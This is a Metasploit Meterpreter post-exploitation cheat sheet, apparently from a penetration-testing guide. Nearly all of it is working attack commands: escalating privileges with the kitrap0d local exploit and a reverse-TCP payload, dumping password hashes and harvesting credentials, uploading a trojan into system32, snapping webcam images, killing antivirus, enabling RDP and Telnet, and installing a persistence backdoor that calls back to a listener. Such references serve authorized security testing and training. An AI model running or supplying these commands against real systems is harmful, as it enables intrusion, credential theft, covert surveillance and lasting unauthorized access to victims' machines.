Meterpreter

  • msf > sessions [options or ID]: The sessions command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNCs, and so on (use sessions -h to get help).

  • meterpreter > background: This will send the current Meterpreter session to the background and return you to the msf prompt.

  • meterpreter > getuid: Displays the user account that the Meterpreter server is running as on the host.
  • meterpreter > sysinfo: Displays the victim's OS info.
  • meterpreter > cd: Changes the current directory on the compromised system.
  • meterpreter > ls: Lists the current directory's contents.
  • meterpreter > pwd: Prints the current directory on the compromised system.
  • meterpreter > ps: Displays a list of running processes on the target.
  • meterpreter > run post/windows/manage/migrate: Migrates to another process on the victim.
  • meterpreter > use priv:  Use this command before executing the getsystem command.
  • meterpreter > getsystem: Use this command to elevate your privileges.

If you get the error priv_elevate_getsystem: Operation failed: Access is denied, then follow these steps:

meterpreter > background

Option 1:

msf > use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) > show options
msf post(local_exploit_suggester) > run

Option 2:

  • msf > use exploit/windows/local/: Tab-completing this prefix lists all of the Windows local exploit modules.
  • msf > use exploit/windows/local/ms10_015_kitrap0d: We've chosen one exploit from the list, as follows:
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.100
msf exploit(ms10_015_kitrap0d) > set LPORT 4445
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM - Hooray
  • meterpreter > search: Provides a way of locating specific files on the target host. For example, search -f passwords*.txt.
  • meterpreter > cat [file name path]: Displays the content of a file when it's given as an argument.
  • meterpreter > download [file name path]: Downloads a file from the remote machine. Note the use of double backslashes when giving the Windows path. For example, download C:\\passwords.txt.
  • meterpreter > upload [local file name] [remote path]: Uploads a local file to the remote machine. For example, upload evil_trojan.exe c:\\windows\\system32.
  • meterpreter > execute [command]: Runs a command on the target system.
  • meterpreter > shell: Executes the shell (Terminal or DOS) on the target system.
  • meterpreter > run post/windows/gather/hashdump: A post module that will dump the contents of the SAM database.
  • meterpreter > ipconfig: Displays the network interfaces and addresses on the remote machine.
  • meterpreter > webcam_list: Displays the currently available webcams on the target host.
  • meterpreter > webcam_snap: Grabs a picture from a connected webcam on the target system and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. For example, webcam_snap -i 1 -v false.
  • meterpreter > python_import [local python file]: Imports a local Python file and executes it on the victim's machine. For example, meterpreter > python_import -f /root/readAutoLogonREG.py.
  • meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24: Performs an ARP scan of the given address range from the compromised host.
  • meterpreter > run post/windows/gather/checkvm: Checks to see if the compromised host is a virtual machine.
  • meterpreter > run post/windows/gather/credentials/credential_collector: Harvests password hashes and tokens on the compromised host.
  • meterpreter > run post/windows/gather/dumplinks: The dumplinks module parses the .lnk files in a user's recent documents, which could be useful for further information gathering.
  • meterpreter > run post/windows/gather/enum_applications: Enumerates the applications that are installed on the compromised host.
  • meterpreter > run post/windows/gather/enum_logged_on_users: Returns a list of current and recently logged on users, along with their SIDs.
  • meterpreter > run post/windows/gather/enum_shares: Returns a list of both configured and recently used shares on the compromised system.
  • meterpreter > run post/windows/gather/enum_snmp: Enumerates the SNMP service configuration on the target, if present, including the community strings.
  • meterpreter > run post/windows/gather/hashdump: Dumps the local users' accounts on the compromised host using the registry.
  • meterpreter > run post/windows/gather/usb_history: Enumerates the USB drive history on the compromised system.
  • meterpreter > run getcountermeasure: Checks the security configuration on the victim's system and can disable other security measures, such as A/V, the firewall, and much more.
  • meterpreter > run getgui -e: Enables RDP on a target system if it is disabled.
  • meterpreter > run gettelnet -e: Enables Telnet on the victim if it is disabled.
  • meterpreter > run killav: Disables most antivirus programs running as a service on a target.
  • meterpreter > run remotewinenum -u administrator -p password123 -t 10.0.0.100: Enumerates the system information through wmic on the victim. Makes note of where the logs are stored.
  • meterpreter > run scraper: Grabs the system information, including the entire registry.
  • meterpreter > run winenum: This makes for a very detailed Windows enumeration tool. It dumps tokens, hashes, and much more.
  • meterpreter > run persistence -U -i 10 -p 443 -r 192.168.1.5: Configures our persistent Meterpreter session to wait until a user logs on to the remote system and tries to connect back to our listener every 10 seconds at IP address 192.168.1.5 on port 443.